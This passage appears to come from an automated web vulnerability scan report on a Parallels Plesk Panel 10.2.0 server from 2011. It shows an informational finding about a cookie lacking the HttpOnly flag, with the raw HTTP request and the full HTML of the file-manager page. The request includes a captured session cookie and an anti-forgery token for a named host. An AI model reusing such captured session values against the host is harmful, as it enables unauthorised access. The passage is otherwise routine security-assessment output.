               if (el) {
                   el.className = "formArea";
               }
               }
           }
           return false;
       }
       function hideinfo_oC(f)
       {
           if (document.getElementById) {
               var el = document.getElementById("bid-unhandlederror-hideinfo");
               if (el) {
                   el.className = "hiddenElement";
               }
               var el = document.getElementById("bid-unhandlederror-showinfo");
               if (el) {
                   el.className = "commonButton";
               }
               var el = document.getElementById("errorArea");
               if (el) {
                   el.className = "hiddenElement";
               }
           }
           return false;
       }
       function submitticket_oC(f)
       {
           f.cmd.value="submitticket";
           f.submit();
           return false;
       }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/permissions/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="bdaafe67daaa200e2f077bd9577b09f4">
   <input type="hidden" name="cmd" value="update">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   <style>
.hiddenElement {
display: none;
}
</style>

<div class="formArea">

<div><img src="/skins/default/plesk/icons/off.gif" width="16" height="16" align="absmiddle">&nbsp;The operation you were performing failed. You can retry the operation with or without changing its parameters. You may also want to report this problem to our support so that we could help you as soon as possible.</div>
<div class="formButtons">
   <table width="100%" cellspacing="0" cellpadding="0"><tr>
       <td align="left" width="0"><DIV class="commonButton" id="bid-unhandlederror-showinfo" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to view detailed information on the error.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return showinfo_oC(document.forms[0]);return false;" style=""><BUTTON name="bname_unhandlederror_showinfo" id="buttonid-unhandlederror-showinfo" type="button" onClick="Event.stop(event);return showinfo_oC(document.forms[0]);return false;">Show Details</BUTTON><SPAN id="spanid-unhandlederror-showinfo">Show Details</SPAN></DIV><DIV class="commonButton" id="bid-unhandlederror-hideinfo" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to hide additional information on the error.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return hideinfo_oC(document.forms[0]);return false;" style=""><BUTTON name="bname_unhandlederror_hideinfo" id="buttonid-unhandlederror-hideinfo" type="button" onClick="Event.stop(event);return hideinfo_oC(document.forms[0]);return false;">Hide Details</BUTTON><SPAN id="spanid-unhandlederror-hideinfo">Hide Details</SPAN></DIV></td>
       <td class="misc" width="0"><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/hosting/file-manager/&#039;); return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/hosting/file-manager/&#039;); return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN></DIV></td>
   </tr></table>
</div>


</div>
<div class="hiddenElement" id="errorArea">
<br>Additional Information<br><br>
   <textarea rows=20 name="description" readonly>
FileManager::get_file_info_wrapper() failed: filemng util failed: Empty input path: (87) The parameter is incorrect.
---------------------- Debug Info -------------------------------
0: FilePermissionsUIPointer.php:34
   FilePermissionsUIPointer-&gt;accessItem(string &#039;GET&#039;, NULL null)
1: UIPointer.php:600
   UIPointer-&gt;access(string &#039;GET&#039;)
2: plesk.php:47
   </textarea>
</div>





</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.26. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/rename/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/rename/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/hosting/file-manager/rename/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; no_frames=deleted; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:58:34 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:58:37 GMT
Connection: close
Content-Length: 56922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="bdaafe67daaa200e2f077bd9577b09f4" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fcertificate%2540%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fmpc-certificates%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>File Manager</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/filemanager/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/hosting/file-manager/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;


           function update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "update";
               lsubmit(f);

               return false;
           }

           function chmod_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "chmod";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function rename_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "rename";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function new_file_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_file";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/"
               lsubmit(f);

               return false;
           }

           function count_size_oC()
           {
               f = document.forms[0];
               f.cmd.value = "count_size";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function extract_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "extract";
               f.subcmd.value = "";
               lsubmit(f);
               return false;
           }

           function pack_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/pack/"
               lsubmit(f);

               return false;
           }

           function create_archive_oC() {
               f = document.forms[0];

               if ("" == f.archive_name.value) {
                   alert("Please enter file name.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "pack";
               lsubmit(f);

               return false;
           }

           function new_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_dir";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-dir/"
               lsubmit(f);

               return false;
           }

           function create_file_oC()
           {
               f = document.forms[0];
errorfield(f.new_file, false);

               if (f.create_file_method[0].checked) { // upload
                   f.cmd.value = "upload_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               if (f.create_file_method[1].checked) { // create
                   if (f.new_file.value == "") {
        errorfield(f.new_file, true);
                       alert("Some fields are empty or contain an improper value.");
                       f.new_file.focus();
                       return false;
                   }

                   f.cmd.value = "create_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               return false;
           }

           function create_file_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_file";
               f.subcmd.value = "save";
               lsubmit(f);

               return false;
           }

           function create_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_dir";
               f.file.value = f.new_dir.value;
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function edit_reset_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "";
               f.reset();
               return false;
           }

           function edit_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save";
               lsubmit(f);
               return false;
           }

           function edit_save_exit_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save_exit";
               lsubmit(f);
               return false;
           }

           function codepage_oC()
           {
               f = document.forms[0];
               f.subcmd.value = "codepage";
               lsubmit(f);
               return false;
           }

           function cancel_oC()
           {
               f = document.forms[0];
               f.cmd.value = "";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/"
               lsubmit(f);
               return false;
           }

           function touch_oC()
           {
               f = document.forms[0];

               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               if (!confirm("Are you sure you want to change the timestamp of the selected files?"))
                   return false;

               f.cmd.value="touch";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function copy_move_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="copy_move";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/copy-move/"
               lsubmit(f);

               return false;
           }

           function copy_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "copy";
               lsubmit(f);

               return false;
           }

           function move_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "move";
               lsubmit(f);

               return false;
           }

           function remove_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/remove/"
               lsubmit(f);

               return false;
           }

           function remove_submit_oC()
           {
               f = document.forms[0];
               if (!f.confirm.checked) {
                   alert("You must confirm deletion.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function check_selection()
           {
               f = document.forms[0];
               selected = 0;
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]") && f.elements[i].checked) {
                       selected++;
                   }
               }
               return selected;
           }

           function perm_click(t, id) {
               el = document.forms[0].elements;
               switch (t) {
               case "ra":
                   if (el["ra_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["wa_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "rd":
                   if (el["rd_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["wd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "wa":
                   if (el["wa_perm[" + id + "]"].checked) {
                       el["wd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "wd":
                   if (el["wd_perm[" + id + "]"].checked) {
                       el["wa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "xa":
                   if (el["xa_perm[" + id + "]"].checked) {
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["wa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "xd":
                   if (el["xd_perm[" + id + "]"].checked) {
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["wd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "fa":
                   if (el["fa_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = true;
                       el["wa_perm[" + id + "]"].checked = true;
                       el["xa_perm[" + id + "]"].checked = true;
                       el["rd_perm[" + id + "]"].checked = false;
                       el["wd_perm[" + id + "]"].checked = false;
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                   }
                   break;
               case "fd":
                   if (el["fd_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = true;
                       el["wd_perm[" + id + "]"].checked = true;
                       el["xd_perm[" + id + "]"].checked = true;
                       el["ra_perm[" + id + "]"].checked = false;
                       el["wa_perm[" + id + "]"].checked = false;
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                   }
                   break;

               }
           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/rename/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="bdaafe67daaa200e2f077bd9577b09f4">
   <input type="hidden" name="cmd" value="">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   


<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <SPAN class="commonButton" id="bid-create-dir-disabled" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Cannot create a folder in this folder.&quot;&#125;]);" onMouseOut="tooltip.hide();" style=""><BUTTON name="bname_create_dir" disabled id="buttonid-create-dir-disabled" type="button">Add New Directory</BUTTON><SPAN id="spanid-create-dir-disabled">Add New Directory</SPAN></SPAN>
           <SPAN class="commonButton" id="bid-create-file-disabled" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Cannot create a file in this folder.&quot;&#125;]);" onMouseOut="tooltip.hide();" style=""><BUTTON name="bname_create_file" disabled id="buttonid-create-file-disabled" type="button">Add New File</BUTTON><SPAN id="spanid-create-file-disabled">Add New File</SPAN></SPAN>
       </div>
       
   </td></tr></table></fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>Files</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       
       <script>
           function a(event) { tooltip.set(event, [{"type":"string","string":"Edit the file."}]); }
           function b(event) { tooltip.set(event, [{"type":"string","string":"View the file."}]); }
           function c(event) { tooltip.set(event, [{"type":"string","string":"i_filemanager__chdir"}]); }
           function d(event) { tooltip.set(event, [{"type":"string","string":"Change access rights to the file or directory."}]); }
           function e(event) { tooltip.set(event, [{"type":"string","string":"Change the file or directory name."}]); }
           function f(event, type) {
               switch (type) {
                   case "pdir":
                       tooltip.set(event, [{"type":"string","string":"Go to the directory one level up."}]);
                       break;
                   case "dir":
                       tooltip.set(event, [{"type":"string","string":"Go inside the directory."}]);
                       break;
                   case "text":
                       tooltip.set(event, [{"type":"string","string":"View the text file contents."}]);
                       break;
                   case "image":
                       tooltip.set(event, [{"type":"string","string":"View the image."}]);
                       break;
                   case "audio":
                       tooltip.set(event, [{"type":"string","string":"Audio file."}]);
                       break;
                   case "security":
                       tooltip.set(event, [{"type":"string","string":"Apache security file."}]);
                       break;
                   case "webscript":
                       tooltip.set(event, [{"type":"string","string":"Webscript page file."}]);
                       break;
                   case "wappage":
                       tooltip.set(event, [{"type":"string","string":"WAP page file."}]);
                       break;
                   case "webpage":
                       tooltip.set(event, [{"type":"string","string":"Web page file."}]);
                       break;
                   case "compressed":
                       tooltip.set(event, [{"type":"string","string":"Compressed file."}]);
                       break;
                   case "unknown_text":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (text data)."}]);
                       break;
                   case "unknown_binary":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (binary data)."}]);
                       break;
               }
           }
           function g(event) { tooltip.set(event, [{"type":"string","string":"Edit the file in a visual editor."}]); }
           function h(event) { tooltip.set(event, [{"type":"string","string":"Editing the file in a visual editor requires Internet Explorer version 5.5 or later."}]); }
           function i(event) { tooltip.set(event, [{"type":"string","string":"Open the file in a browser."}]); }
           function download_hint(event) { tooltip.set(event, [{"type":"string","string":"Download the file."}]); }
           function z() { tooltip.hide(); }

           function bin() { return confirm("This file may be a binary file. Do you want to open it?"); }
       </script>
       <div id="FileListSearch" class="actions-box show"><table width="100%" cellspacing="0" class="buttons"><tr><td class="main"><div><DIV class="commonButton" id="bid-remove-selected" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Delete the selected files or directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);remove_oC();return false;" style=""><BUTTON name="bname_remove_selected" id="buttonid-remove-selected" type="button" onClick="Event.stop(event);remove_oC();return false;">Remove</BUTTON><SPAN id="spanid-remove-selected">Remove</SPAN></DIV><DIV class="commonButton" id="bid-touch" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to change the timestamp.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);touch_oC();return false;" style=""><BUTTON name="bname_touch" id="buttonid-touch" type="button" onClick="Event.stop(event);touch_oC();return false;">Change Timestamp</BUTTON><SPAN id="spanid-touch">Change Timestamp</SPAN></DIV><DIV class="commonButton" id="bid-copy-move" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to copy or move to another directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);copy_move_oC();return false;" style=""><BUTTON name="bname_copy_move" id="buttonid-copy-move" type="button" onClick="Event.stop(event);copy_move_oC();return false;">Copy/Move</BUTTON><SPAN id="spanid-copy-move">Copy/Move</SPAN></DIV><DIV class="commonButton" id="bid-count-size" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Calculate the total size of selected files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);count_size_oC();return 
false;" style=""><BUTTON name="bname_count_size" id="buttonid-count-size" type="button" onClick="Event.stop(event);count_size_oC();return false;">Calculate Size</BUTTON><SPAN id="spanid-count-size">Calculate Size</SPAN></DIV><DIV class="commonButton" id="bid-extract-archive" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Extract files from the selected archives into the current directory. Note that the file names may be displayed improperly after the extraction if they contain national characters.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);extract_oC();return false;" style=""><BUTTON name="bname_extract_archive" id="buttonid-extract-archive" type="button" onClick="Event.stop(event);extract_oC();return false;">Extract Files</BUTTON><SPAN id="spanid-extract-archive">Extract Files</SPAN></DIV></div></td><td class="misc"><div id="FileListSearchControl" class="show"><DIV class="commonButton" id="bid-search-show" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to show search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchShow();;return false;" style=""><BUTTON name="bname_search_show" id="buttonid-search-show" type="button" onClick="Event.stop(event);FileListSearchShow();;return false;">Show Search</BUTTON><SPAN id="spanid-search-show">Show Search</SPAN></DIV><DIV class="commonButton" id="bid-search-hide" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to hide search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchHide();;return false;" style=""><BUTTON name="bname_search_hide" id="buttonid-search-hide" type="button" onClick="Event.stop(event);FileListSearchHide();;return false;">Hide Search</BUTTON><SPAN id="spanid-search-hide">Hide Search</SPAN></DIV></div></td></tr></table><table 
width="100%" cellspacing="0" class="searchArea buttons"><tr><td class="main"><div><TABLE cellspacing="0" class="searchSimple"><TR><TD><input type="text" name="filter" id="searchInput" value="" size="20" maxlength="245"></TD><TD><DIV class="commonButton" id="bid-search" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enter a search pattern and click to find files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;" style=""><BUTTON name="bname_search" id="buttonid-search" type="submit" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;">Search</BUTTON><SPAN id="spanid-search">Search</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-show-all" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Show all files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;" style=""><BUTTON name="bname_show_all" id="buttonid-show-all" type="button" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;">Reset Search</BUTTON><SPAN id="spanid-show-all">Reset Search</SPAN></DIV></TD></TR></TABLE></div></td></tr></table></div><div class="paging pagingTop"><input type="hidden" name="page" value ="0"><input type="hidden" name="page_size" value ="25"><table width="100%"><tr><td>11 <A 